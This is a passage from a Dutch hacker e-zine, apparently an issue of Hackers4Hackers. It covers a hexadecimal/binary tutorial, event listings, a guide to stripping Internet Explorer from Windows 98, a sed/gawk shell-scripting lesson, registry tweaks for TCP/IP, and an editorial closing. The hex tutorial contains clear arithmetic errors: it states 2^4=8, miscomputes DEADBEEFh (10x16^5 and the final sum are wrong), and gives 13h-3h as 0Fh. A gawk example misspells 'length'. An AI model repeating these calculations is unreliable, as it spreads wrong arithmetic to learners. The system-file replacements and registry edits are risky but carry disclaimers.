hieronder).
_
|_|
|_|
Met 4 vershillende bits kan je 8 (2^4=8) verschillende uitkomsten
krijgen, we hebben er dus maar 7 nodig.
-Hex-
De computer werkt met het binaire talstelsel, wij niet omdat we niet
snel met dit talstelsel kunnen werken.
Dus is er het Hexadecimale (hex) uitgevonden, dit is een 16 tallig
talstelsel wat loopt van 0 tot en met F
dus: 0 1 2 3 4 5 6 7 8 9 A B C D E F
A = 10
B = 11
C = 12
D = 13
E = 14
F = 15
even wat sommetjes:
1557 hexadecimaal naar decimaal omrekenen doen we zo:
7 x 16^0 = 7
5 x 16^1 = 80
5 x 16^2 = 1280
1 x 16^3 = 4096
________+
5463 dec
5463 decimaal naar hex gaat hetzelfde als decimaal naar binair maar dan
met het getal 16 inplv 2.
DEAD BEEF is dus geen woord maar een hexadecimaal getal.
dat een karakter hexadecimaal is geven we aan door achter het karakter
(hex) h of # te zetten
DEAD BEEFh is dus
15 x 16^0 = 15
14 x 16^1 = 224
14 x 16^2 = 3584
11 x 16^3 = 45056
13 x 16^4 = 851968
10 x 16^5 = 1048576
14 x 16^6 = 234881024
13 x 16^7 = 3489660928
____________+
3726491375
van hexadecimaal naar binair is nog makkelijker
DEAD BEEFh is binair:
1101 1110 1010 1101 1011 1110 1110 1111
reken dit nog maar eens via decimaal om.
andersom is het net zo makkelijk:
als we het getal 000001011010111 hebben en naar hex willen omrekenen
hakken we eerst alles
in groepen van 4 bits.
dit is echter een 9 bits getal, alle nullen aan de linkerkant zijn te
verwaarlozen dus die dumpen
we gewoon, of we plakken er wat bij.
0010 1101 0111
dit kunnen we weer via decimaal omrekenen, maar dat hoeft niet, we
spieken gewoon even in een
tabel zoals hieronder en zetten het getal zo om:
bin hex dec
0000 0 0
0001 1 1
0010 2 2
0011 3 3
0100 4 4
0101 5 5
0110 6 6
0111 7 7
1000 8 8
1001 9 9
1010 A 10
1011 B 11
1100 C 12
1101 D 13
1110 E 14
1111 F 15
0010 1101 0111 is dus 2D7h
Het optellen van hexadecimale waardes:
8h + 1h9h
9h + 3hC geen 13h! 13h is 16+3=19!!!
Het aftrekken van hexadecimale waardes:
13h -3h0Fh geen 10H!
hexadecimaal rekenen is dus niet moeilijk, je moet alleen uitkijken dat
je niet stiekem decimaal
gaat zitten rekenen zoals ze dat op de basischool in je hoofd hebben
proberen te stampen ;p
Oh en dan is er ook nog het octale stelsel, dit is 8 tallig en ga ik
lekker niet behandelen,
ze gebruiken dat toch nergens en het is hetzelfde idee.
Misschien ga ik nog een artikeltje schrijven over dit gedoe, of wat
electronica ofzo..misschien ook niet :>
Ohw voor ik ga: thnx to hawk dat ie dit stukkietxt nog heeft
gemaintained op zijn disc
(hmm als je niet zo moeilijk deed was dat trouwens ook niet nodig
geweest :P) en asby voor dat ene 3l33t scrippie.. ;-)
--
PhantomL0rd //There is nobody so irritating as somebody with less
intelligence and more sense than we have.
-------------------------------------------------------
08. Evenementen
-------------------------------------------------------
Smart Business
URL: www.iib.nl
Datum: 14-16 November 2000
Locatie: RAI, Amsterdam
Secure IT Academy
URL: http://www.infocare-events.nl/events/secure-it-academy2.html
Datum: 28 september - 23 november 2000
Locatie: Holiday Inn, Utrecht
Anti Hacking Workshop 2000 (IV)
URL: http://www.infocare-events.nl/events/anti-hacking-lV.html
Datum: 27 November
Locatie: Hotel Okura Amsterdam
ASPworld.nl
URL: http://www.aspworld.nl/
Datum: 21 en 22 November
Locatie: Mercure Hotel, Nieuwegein
Veilig werken met Windows NT
URL: http://www.infocare-events.nl/events/veilig-windowsnt.html
Datum: 12 en 13 December 2000 en 27 - 28 Februari 2001
Locatie: Daxis, Deventer
IT Security Management
URL: http://www.infocare-events.nl/events/it-security-management.html
Datum: 13 en 14 Februari 2001
Locatie: Holday Inn, Utrecht
-------------------------------------------------------
09. Windows '98 zonder Internet Explorer
-------------------------------------------------------
DISCLAIMER:
{
Let op, dit artikeltje vertelt u alleen hoe u IE zou kunnen verwijderen.
Na het verwijderen van IE geeft Microsoft *geen* support meer omdat
het niet meer een "normale Windows '98" installatie bevat,
d.w.z. als u support wilt hebben zult u Windows opnieuw moeten installeren.
U doet *alles* op uw *eigen* risico, u zult noch mij, noch H4H aansprakelijk
stellen voor de schade die dit kan aanrichten
Ik denk dat dit wel duidelijk genoeg is :]
(Ik wil ook niet rechtelijk vervolgd kunnen worden omdat een of andere
sukkel iets verkeerd doet :])
}
Ik dacht dat best wel veel mensen geïnteresseerd zouden zijn in een artikel over
Internet Explorer totaal uit Windows'98 te verwijderen. Volgens Microsoft is dit
niet mogelijk, nou hier is het bewijs dat het *wel* kan!
Voordat ik begin met vertellen hoe u IE kunt verwijderen zal ik eerst even de
voor-
en nadelen op een rijtje zetten voor u:
Voordelen:
o Windows '98 wordt sneller doordat bepaalde onderdelen niet meer
geladen hoeven te worden, dit merk je vooral met 32MB RAM aan
geheugen
o Er komt rond de 40 MB aan HDD ruimte vrij
o Er komen veel meer systeembronnen beschikbaar (controle kan
d.m.v.
te klikken met de rechtermuis knop op "Deze Computer" dan voor
Eigenschappen en dan weer prestatie's)
Nadelen :
o De HTML-Help functie van Windows zal af en toe een waarschuwing
geven bij het gebruik daarvan, deze kunt u gewoon negeren
o De functie "Automatisch sorteren op alfabetische volgorde" in het
startmenu functioneert dan niet meer
o De map "Mijn Documenten" is geen systeem map meer en heeft ook
geen
speciale betekenis meer
o In het Start menu is het niet meer mogelijk om items toe te
voegen
en te verwijderen via de drag & drop functie, ook met de rechter-
muisknop klikken doet het niet meer
o De functie "Weergeven als webpagina" zal ook niet meer
functioneren
o Wordpad en Notepad doen het ook niet meer, deze zijn gewijzigd
voor
Windows '98 en zullen niet meer functioneren
o http://windowsupdate.microsoft.com/ zal ook niet meer
functioneren
U kunt dan uw patches via
http://www.microsoft.com/windows98/download/corporate.asp ophalen
Nu u weet wat de voordelen en de nadelen zijn van het verwijderen van IE kunt u
beslissen of u door gaat of niet.
Vereisten:
o Een PC met daarop Windows'98
o Windows '98 CD-ROM
o Windows '95 OSR-2 CD-ROM (build 4.00.950B of 4.00.1111) of
Windows '95 OSR-1 CD-ROM (build 4.00.950a) of
de Windows '95 CD-ROM (build 4.00.950)
Let op: Zonder 1 van deze CD-ROM's zal Windows '98 *niet*
correct functioneren na het verwijderen van IE!
o Een paar geformateerde floppy's voor het backup'en van wat
bestanden
We gaan nu het volgende stappenplan uitvoeren dat er als volgt uitziet:
[1] Backup maken
[2] Windows '95 bestanden kopiëren
[3] Rebooten in MS-DOS mode
[4] Windows '95 bestanden extracten
[5] Windows '98 bestanden vervangen
[6] Reboot van het systeem
[7] IE bestanden verwijderen
[8] Registery editen
[9] Humor
Stap 1: Backup
Het is van groot belang dat u de registery en wat andere file's backup't
De registery kunt u op een makkelijke manier backup'en, namelijk:
Klik op [Start] - [Uitvoeren] - Type dan "scanregw.exe" in (zonder de quotes)
Het is ook noodzakelijk dat u de Windows map kopiëert.
Start Windows Verkenner op -> Maak dan een map aan dat bijv. Backup heet
Klik dat met de rechter muis knop op Windows en sleep het naar "Backup" of uw
map, dan klikt u op "Hierheen kopiëeren"
Hetzelfde moet u doen met de map "Internet Explorer" in "Program Files"
Dit alles is om een fatale poging tot IE te verwijderen te voorkomen.
Als het mislukt, kunt u nog altijd uw systeem terugzettten.
(Ik raad u aan om dit te doen in MS-DOS modus omdat u anders de kans heeft dat
bepaalde Windows bestanden niet worden gekopiëerd omdat deze in gebruik zijn)
Stap 2: Windows '95 bestanden kopiëren
U moet nu de file "win95_02.cab" van de Windows '95 CD-ROM halen.
U kunt deze file vinden in de \WIN95\ map. U selecteert het en
kopiëert het naar uw HDD
Stap 3: Rebooten in MS-DOS mode
U kunt naar MS-DOS mode overschakelen door op [Start] - [Afsluiten] -
te klikken, dan selecteert u "Opnieuw opstarten in MS-DOS modus" en dan op [OK]
Stap 4: Windows '95 bestanden extracten
De bestanden die we nodig hebben zitten in het zonet door u gekopiëerde
"win95_02.cab". Ze zijn d.m.v. compressie technieken in één file gezet
en "verkleint".
U gaat naar de directorie / map waar u zojuist de file naartoe heeft
gekopiëert.
Dan voert u de volgende commando's uit:
"extract /a win95_02.cab explorer.exe" (zonder de quotes!)
"extract /a win95_02.cab comdlg32.dll" (zonder de quotes!)
"extract /a win95_02.cab shell32.dll" (zonder de quotes!)
Stap 5: Windows '98 bestanden vervangen
U moet nu de volgende commando's uitvoeren om de Windows '98 bestanden te
vervangen.
Let op dat u nog steeds in dezelfde directorie zit als waar u die files heeft
uitgepakt
Type in: "copy explorer.exe c:\windows" (zonder de quotes, ik neem aan dat u
Windows in C drive heeft geinstalleerd)
Als het goed is wordt u nog gevraagd of u explorer.exe wilt vervangen,
u kiest dan ja
Hierna voert u deze commando uit: "copy *.dll c:\windows\system"
Weer zonder de quotes! Er wordt weer gevraagt of u bestanden wilt
vervagen en weer kiest u ja
Stap 6: Reboot van het systeem
U kunt nu uw systeem opnieuw opstarten, Reset-knop of CTRL + ALT + DEL
Stap 7: IE bestanden verwijderen
Uw PC draait nu al sneller en er zijn nu ook al meer systeem bronnen
Beschikbaar
Maar we zijn nog niet klaar, want de IE bestanden staan nog gewoon op de
computer
U moet de volgende mappen met Windows Verkenner verwijderen (ik neem aan dat
Windows
op uw C drive staat):
C:\Program Files\Internet Explorer
C:\Program Files\Uninstall Information
C:\Windows\Application Data\Microsoft\Internet Explorer
C:\Windows\Application Data\Microsoft\Welcome
C:\Windows\Catroot
C:\Windows\Cookies
C:\Windows\Downloaded Program Files
C:\Windows\Java
C:\Windows\Web
C:\Windows\Temporary Internet Files
Maakt u geen gebruik van User Profiles, dan kunt u ook C:\Windows\All Users
verwijderen
Wilt u ook de mappen C:\Windows\Favorites & C:\Windows\History verwijderen
dan zult u dit moeten doen in de MS-DOS modus
Stap [8]: Registery Editen
U moet nu de Windows Registery Editor opstarten, dit doet u door te klikken op
[Start] - [Uitvoeren] en Regedit.exe in te typen gevolgd door [Enter]
U moet nu de volgende keys verwijderen:
Hkey_Current_User\Software\Microsoft\Active Setup
Hkey_Current_User\Software\Microsoft\Advanced INF Setup
Hkey_Current_User\Software\Microsoft\Internet Connection Wizard
Hkey_Current_User\Software\Microsoft\Internet Explorer
Hkey_Current_User\Software\Microsoft\Java VM
Hkey_Current_User\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Hkey_Current_User\Software\Microsoft\Windows\CurrentVersion\Webcheck
Hkey_Local_Machine\Software\Microsoft\Active Setup
Hkey_Local_Machine\Software\Microsoft\Advanced INF Setup
Hkey_Local_Machine\Software\Microsoft\Exchange
Hkey_Local_Machine\Software\Microsoft\IE4
Hkey_Local_Machine\Software\Microsoft\Internet Connection Wizard
Hkey_Local_Machine\Software\Microsoft\Internet Explorer
Hkey_Local_Machine\Software\Microsoft\Java VM
Hkey_Local_Machine\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Hkey_Local_Machine\Software\Microsoft\Windows\CurrentVersion\Welcome
Hkey_Local_Machine\Software\System\CurrentControlSetServices\VxD\JAVASUP
Om nu het register volledig te cleanen van IE entry's die ik ben vergeten op te
noemen bezoekt u de volgende website
http://download.microsoft.com/download/win98SE/Utility/4.1a/W9XNT4/EN-
US/REGCLEAN.EXE
en voert u dit bestand uit op uw PC.
Als het goed is is Windows '98 nu helemaal Internet Explorer - loos :]
Stap 9: Humor
Als IE is verwijderd kan dit tot grappige situatie's brengen, kijk bijv. eens
onder
[Start] - [Instellingen] - [Configuratiescherm] - [Internet Optie's]
U zult zien dat commentaar van de IE programmeurs aanwezig zijn in de menu's.
Nog veel succes bij het verwijderen van IE!
-=> ACiN <=-
Voor commentaar/tips/flames kunt u me mailen op: acin@softhome.net
-------------------------------------------------------
10. De Basis Van Shellscripting (deel 2)
-------------------------------------------------------
lo, daar zijn we weer..deze keer zal ik et wat beter leesbaar maken omdat
ik deze keer wat eerder van tevoren begin en nu wat meer tijd heb..et word
wel wat moeilijk dus wel goed opletten..
Console-in- en uitvoer
Oke, er zijn wat commando's die je eerst een beetje moet beheersen wil je
met ze werken..maar ik heb geen zin om dat allemaal hier uitgebreid uit te
gaan leggen (die commando's dus)..het gaat om o.a. echo, printf, read,
tput en zo kan ik wel doorgaan..ik zal elk commando een beetje doornemen
maar voor gedetaileerdere info doe je man commando.
oke laten we maar es beginnen met echo, ik ga niet op echo in, ik zeg
alleen ff dat je man echo moet doen..heb je de man page gelezen dan kan je
verder gaat met et lezen van dit artikel :)
oke..we gaan nu verder met tput..daar ga ik wel ff op in :)
met tput kan je heel veel zoals: de cursorpositie bepalen, voor en
achtergrond kleur van scripts bepalen, het gehele te scherm wissen..etc..
maar laten we es maar es uitleggen hoe je dat allemaal doet, ik ga hier ff
een paar attributen noemen die je kunt opvragen en instellen, tis niet
alles wat je met tput kan maar zoals ik al zei de belangerijkste..
parameter functie
cols het aantal kolommen v/h huidige scherm op
de standaarduitvoer
lines het aantal regels v/h huidige scherm
it indent tab, het aantal tekens dat een tab
maximaal verder springt
clear wist het scherm en plaatst cursor in
linkerbovenhoek
el wist de inhoud v/d huidige regel vanaf de
huidige cursorpositie
bold lichtere weergave
sgr0 de weegave word weer normaal ingesteld
nev negatieve weergave
cup y x plaatst de cursor op positie X/Y waarbij
geldt dat 0 <= x < tput cols en
0 <= y < tput files
colors het aantal kleuren dat het scherm in
console kan weergeven
setaf x stelt de voorgrondkleur in. 0<= x <= tput
colors
setab x stelt achtergrond kleur in. 0<= x <= tput
colors
x kleur
0 zwart
1 rood
2 groen
3 oranje/geel
4 blauw
5 paars
6 lichtblauw
7 grijs
oke we gaan verder met de opracht select. zoals je tot nu toe hebt gemerkt
ging et vooral over de uitvoer en niet over de invoer. nu gaan we et es
hebben over invoer en daarom kunnen we mooi met de opracht select beginnen..
zo werkt select ongeveer:
select var1 in woordenlijst ; do
opdracht 1
opdracht 2
etc...
done
select geeft alle woorden van woordenlijst onder elkaar weer en nummert ze
van 1 tot x. je kan dan allen getallen van 1 t/m x geldig invoeren.
daarbij krijgt var1 de waarde van het eerste woord.
hier ff een simpel voorbeeldje:
echo "welk woord moet bewerkt worden?"
select woord in $1 ; do
vi $woord
done
echo "einde"
exit 0
daarna doe je zoiets als
./script.sh \*.txt
dan krijg je te zien
welk woord moet bewerkt worden?
1) @NE2000.txt 3) shell-scripting.txt
2) sedfaq.txt 4) shell-scripting2.txt
#?
dan kies je bijvoorbeeld 1 en dan wordt dat bewerkt met vi.
je hebt ook nog de opracht read, hier ff klein voorbeeldje:
read neuk
nslookup $neuk
dus je kan met read een variabele aangeven..lijkt me verder duidelijk.
helaas is het bijna onmogelijk om van het toetsenbord uit te lezen in
shell scripts..dan zou je C het best moeten toepassen..maar daar gaat het
nu niet over..dus gaan we maar snel naar et volgende hoofdstuk.
Parameters
als je bijvoorbeeld een programma maakt en je wil er parameters aan
geven zoiets als ./proggie -o dan doet die -o erbij iets..net als ls
-al wat anders doet dan ls gewoon..dan kan je zelf parameters maken
met getopts en zo ziet dat eruit:
getopts <parameternamen> <variabelen>
oke, dit lijkt me duidelijk, lekker kort weer mjah, laten we maar weer
verder gaan.
Sed
En hier is ie dan, De basis van Sed :)
sed is een programma voor de manipulatie van textbestanden.
je kan sed op veel verschillende manieren definieren maar dit zijn de 2
meest gebruikte (wil je andere weten doe je man sed ;)
sed [-n] -e <opdrachten> [>uitvoer] [<invoer] [bestand]
sed [-n] -f <bestand> [>uitvoer] [<invoer] ""
met -f definieer je een scriptbestand en met -e kan je de opdrachten
direct specificeren
sed -n -e '$=' /etc/profile
zal hetzelfde weergeven als
wc -l /etc/profile
waarom? nou omdat $= uit het adres bestaat, $ wat staat voor de laatste
regel in de invoer en de functie =, geeft het huidige regelnummer weer.
hier ff voorkennis/herhaling voordat we weer verder gaan,
4,7 alle regels t/m 7
1,$ alle regels van het bestand
2,4! alle regels behalve 2,3 en 4
/blaat/ alle regels met blaat
oke..
sed -n -e 'p' /etc/profile doet hetzelfde als cat /etc/profile
p geeft zonder speceficatie alle regels weer..je kan ook doen sed -n -e '
8 p' /etc/profile..dan geeft ie de 8ste regel weer..
of bijvoorbeeld je wilt alleen regels met een M zien dan doe je:
sed -n -e '/M/p' /etc/profile
regexp=RE (met dank aan nexu :)
hier wat reguliere expressies:
* een gewoon teken is opzich een RE. de RE /C/ past op elke invoerregel
met het teken C
* een ^ aan het begin van een een RE betekent dat de RE aan het begin v/d
regel moet staan..de RE /^blaat/ vindt dus alleen regels die met blaat
beginnen
* \< aan het begin van een RE vindt alleen regels waarin de
gespecificeerde tekenreeks aan het begin van een woord staat. /\<blaat/
vindt dus de regels "blaathoeren zijn kewl" of "blaatzuigen is nog kewler"
maar vindt niet "hoerenblaat is geen woord meer"
* \> aan het einde van een RE vindt alle regels waarin de RE aan het einde
van een woord staat. /blaat\>/ vindt bijvoorbeeld "geblaat is kewl" maar
niet "blaathoeren zijn kewl"
* een $ teken aan het einde van een RE vindt alle regels waarin de
tekenreeks voor de $ aan het einde v/d regel staat. /pff$/ vindt alle
regels die eindigen op pff
* een \n vindt een regeleinde in de patroonbuffer. een regeleinde aan het
einde v/d patroonbuffer wordt niet gevonden..
* een . staat voor precies een teken in de patroonbuffer. de punt staat
voor alle tekens maar niet voor het afsluitende regeleinde.
/litchfi.ld/ vindt bijvoorbeeld alle met regels litchfield, LitchFielD
maar ook litchFi-ld
* een RE gevolgd door een * vindt alle regels waarin de RE die voor het
sterretje * staat, nul maar of vaker voorkomt. bijvoorbeeld, dit geeft
alle regels weer waarin minimaal al staat, gevolgd door 0 of meer l's
(al, all, alll...)
sed -n -e '/all*/p' bestand
* [] kan ook nog wat..bijvoorbeeld /[abc]/ vindt dan alleen a, b en c of
/[a-h]/ vindt a t/m h
* RE's kunnen met behulp van \( en \) gegroepeerd worden. naar deze
groepen kan je vervolgens verwijzen met \x.x is daarbij een cijfer van 1
t/m 9. als je met \x naar een groep verwijst telt sed het aantal \('s in
de huidige RE en vervangt \x door de groep nummer x.
hierbij wordt echter niet het patroon v/d groep, maar de tekst die
correspondeert met \x als vervanging gebruikt.
hier voorbeeld:
$ cat bla.txt
aa
ab
ba
bb
ca
$ sed -n '/\([ab]\)\1/p' bla.txt
aa
bb
* een lege RE is gelijk aan de laatste door sed geevalueerde RE.
oke dit waren de reguliere expressies..we gaan verder met wat functies van
sed:
a\ voegt text toe na een regel
c\ vervangt een text
i\ voegt text voor een regel in
d verwijdert regels
s voert vervangingen uit
y vertaalt tekens
= geeft regelnummer van een regel weer
1 geeft besturingstekens in ASCII weer
p geeft de regel weer
n slaat huidige regel over en gaat verder met volgende
r leest inhoud van een ander bestand in de uitvoer
w schrijft invoerregels naar een ander bestand
q beeindigt het sed-script
h kopieert patroonruimte naar opslagruimte en wist huidige inhoud daarvan
H kopieert patroonruimte naar opslagruimte en voegt dit toe aan de huidige
inhoud ervan
g haalt de inhoud van opslagruimte terug en wist de patroonruimte
G haalt de inhoud van opslagruimte terug en voegt deze toe aan
patroonruimte
x verwisselt inhoud van opslagruimte en patroonruimte
b springt naar label of naar einde van script
t zelfde als b, maar springt alleen na vervanging
:[label] label waarnaar wordt gesprongen met t of b
N leest een volgende regel invoer
D verwijdert tot aan ingesloten nieuwe regelteken
P geeft weer tot aan het ingesloten nieuwe regelteken
hier nog enkele voorbeelden:
Een tekst voorzien van een rand doe je zo:
sed -e 's/^/..../' /etc/profile
verwijdert alle regels die BSD bevatten:
sed -e '/BSD/d' bestand
geeft alles weer tussen BEGIN en END:
sed -n -e '/^BEGIN/,/^END/p' bestand
verwijdert elke regel die SAVE niet bevat:
sed -e '/SAVE/!d' bestand
oke..dit was et weer..hopelijk was et een beetje te vatten :) laten we
maar snel doorgaan naar awk :)
Gawk
zal ik niet zoveel over zeggen als over sed..maar toch nog wel wat.
oke..alleen echt de basis ervan..dus ik ga niet alle functies noemen hier
etc..Gawk is een gnu versie van awk, das een krachtig
patroonvergelijkingsprogramma voor het verwerken van textbestanden.
de regexp is bijna etzelfde als bij sed dus die kan je gewoon gebruik in
principe ook bij gawk..hier zal ik ff wat voorbeelden noemen en een beetje
uitleggen hoe et werkt:
gawk scripts bestaan uit patronen en procedures
gawk patroon {procedure}
je kan kan gawk in deze 2 vormen gebruiken:
gawk [opties 'script' bestand(en)
gawk [opties] -f scriptbestand bestand(en)
wat zou je moeten kennen om gawk goed te moeten beheersen?
de gawk opdrachten, systeemvariabelen van gawk en operatoren (man gawk of
man awk informeert goed hierover)
hieronder ff wat voorbeelden
toont eerste veld van elke regel:
gawk '{print $1}' bestand
toont alle regels die patroon bevatten:
gawk '/patroon/' bestand
toont eerste veld van regels die blaat bevatten:
gawk '/patroon/{print $1}' bestand
toont records die meer dan 2 velden bevatten:
gawk 'NF > 2' bestand
telt en toont het aantal maal dat blaat is gevonden:
gawk '/blaat/{++x} END {print x}' bestand
toont regels die minder dan 20 tekens bevatten:
gawk 'lenght($0) < 20' bestand
oke..dit was ff een simpele inleiding tot gawk..ik wil hier best meer over
vertellen als hier interesse voor is...
Oke en dit was et alweer..ik ga waarschijnlijk nog een artikel schrijven
over dit onderwerp (de dingen die ik dan ga bespreken zijn o.a. processen
en signalen, functies, variabelen/arrays etc, debuggen en meer :) en
is dan gelijk mn laatste artikel..want dan kent u de basis mensen :)
laterz
max (mmo@casema.net)
/* greetz 2: #eval & #h4h & #freeworld */
-------------------------------------------------------
11. Windows Register tips en trucs (deel 2)
-------------------------------------------------------
-=[Disclaimer]=-
Ik ben niet verantwoordelijk wat jullie met je register uitspoken. Als er iets
fout gaat is het jullie eigen schuld. Vergeet dus niet te backuppen. Een beetje
klakkeloos overtikken wat ik zeg.... jullie zouden toch beter moeten weten. Voor
degene die ik nog niet afgeschrikt heb, lees rustig verder.
-=[Inleiding]=-
Ok ik weet dat Linux rules en dat het veel beter is als windows, maar dat wordt
vaak gezegd door mensen die niet eens met windows kunnen werken. In dit artikel
geef ik wat leuke tips en trucs over windows, zodat je ziet dat er veel meer in
windows zit als alleen klikkieklakkie. Dit keer zal ik het meer over
internetinstellingen hebben, want dat is natuurlijk het belangrijkste voor de
echte nerd.
-=[Optimaliseren van je DefaultRcvWindow en DefaultTTL Settings]=-
Het veranderen van je RcvWindow en DefaultTTL samen met andere register
settings, zoals MaxMTU en MaxMSS kan je TCP/IP netwerkverbinding versnellen. Is
dat niet wat we juist allemaal willen, sneller internet. Ok verwacht nu niet dat
je met deze instellingen je kabelmodem kan omtoveren tot een T3 verbinding. En
de veranderingen kunnen natuurlijk ook negatief uitpakken.
RWIN (Receive WINdow) is de buffer waarin je machine data in propt. Pas als deze
vol is gaat ie verder met welke andere TCP transactie er aan de gang is in de
andere threads en sockets, die Winsock heeft geopend als een connectie aan de
gang is.
Ik weet het, dit is erg duidelijk.
De waarde van TTL (Time To Live) geeft aan hoe lang een packet actief kan
blijven voordat hij wordt verworpen. De standaard waarde is '32'.
Ok open het register en ga naar de volgende sleutel:
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP]
Maak een nieuwe "String Value" of een "Tekenreekswaarde" aan en noem deze
'DefaultRcvWindow' . Verander de waarde naar 4288.
Nu nog een key 'DefaultTTL' aanmaken en de waarde op 128 zetten.
Nogmaals deze settings kunnen dus ook negatief uitvallen, want elke
internetverbinding is weer anders.
-=[Optimalizeren van Dial-Up Modem connectie]=-
Ok, nu gaan we de MaxMTU en MaxMSS settings aanpassen. Door dit aan te passen
kan je snelheid van je Dial-Up verbinding verbeterd worden.
MTU staat voor Maximum Transmission Unit en in simpele termen betekend de
maximale grootte die een packet mag hebben als ie over het netwerk crosst.
MSS staat voor Maximum Segment Size en houdt in hoeveel eigenlijke data in een
packet kan gestopt worden en is daarvoor kleiner dan de waarde van MTU.
De standaardwaarde van MTU is 1500 bytes. Dit is een gemiddelde waarde voor een
normale LAN verbinding, maar wanneer je met een modem aan internet hangt is deze
waarde veel te hoog. Dit zorgt niet echt voor een optimale verbinding.
ALs je deze waarde aanpast aan een waarde wat veel beter bij een dial-up
verbinding past zal je een optimalere verbinding hebben.
Ok, we gaan naar de sleutel [HKEY_LOCAL_MACHINE\Enum\Root\Net] en hierin staat
meerdere sleutels, zoals 0000, 0001, ...
Zoek de sleutel waar 'DeviceDesc' de waarde 'Dial-Up Adapter' heeft. In deze
sleutel zit ook een subsleutel die 'Bindings' heet. Open deze subsleutel en je
ziet een string als 'MSTCP\0000'. Let op de viercijferige nummer achter MSTCP,
in dit geval 0000, want je hebt het zo nodig.
Ga nu naar de sleutel [HKEY_LOCAL_MACHINE\Enum\Network\MSTCP] en vergroot de
Subsleutel met dezelfde vier nummers als net.
In deze sleutel vind je een waarde 'Driver' en dat is gelijk aan 'NetTrans\0002'
of iets dergelijks. Onthoud weer dit nummer 0002.
Open nu de sleutel
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans]. Hier zijn
weer subsleutels onderverdeeld. Open de 0002 (of wat het nummer was) sleutel en
in deze sleutel maak je een nieuwe 'string value' of 'tekenreekswaarde' aan, die
je MaxMTU noemt en die zet je op 576 en voeg ook een 'string value' of
'tekenreekswaarde' toe 'MaxMSS' en zet deze op 536.
Verlaat het register en start dan opnieuw op.
-=[Niet meer registreren voor windowsupdate]=-
Zo, dit scheelt weer een aantal pagina's registreren bij Mickey Soft Windows
Update. Ga naar
[HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion]
Verander daar de waarde van Regdone in '1' en voila, klaar is ..... (op de
puntjes je eigen naam in vullen).
Als je zelf iets in windows hebt waarvan je zegt dat vind ik irri of wil ik
veranderen, mail het me dan op onderstaand adres.
Reacties, vragen, opmerkingen, kritiek, flames, love letters to:
Asby
asby@hackers4hackers.org
-------------------------------------------------------
12. Eindwoord
-------------------------------------------------------
Zo dit was hij dan al weer.
Nadat je dit nummer gelezen hebt en denkt van hé dat kan ik ook. Bedenk je dan
wel dat als je de wet overtreed je vroeg of laat een keer gepakt kan worden. En
dat die kans er in zit zie je wel aan dat de laatste tijd er best wel mensen
opgepakt worden in nederland. Dus ga nu niet gelijk met de dns-hack aan de slag
om lame hotmail naar je eigen ip om te zetten ;)
Iets anders wat ook wel lame genoemd mag worden is bijvoorbeeld het #h4h irc
kanaal proberen over te nemen. Waardoor je het plezier van veel mensen loopt te
vergallen. En ohw wat ben je dan l33t... Maar goed, het kanaal is nu tijdelijk
gesloten. En dit hopen we in begin december weer open te kunnen gooien voor
iedereen. Dus nog even geduld.
Als je nou nog steeds verveeld dan ga je gewoon een artikel voor h4h schrijven
want dat is wel l33t ;) en mail je dat naar artikel@hackers4hackers.org
In ieder geval veel lees plezier en tot de volgende H4H
(De redactie)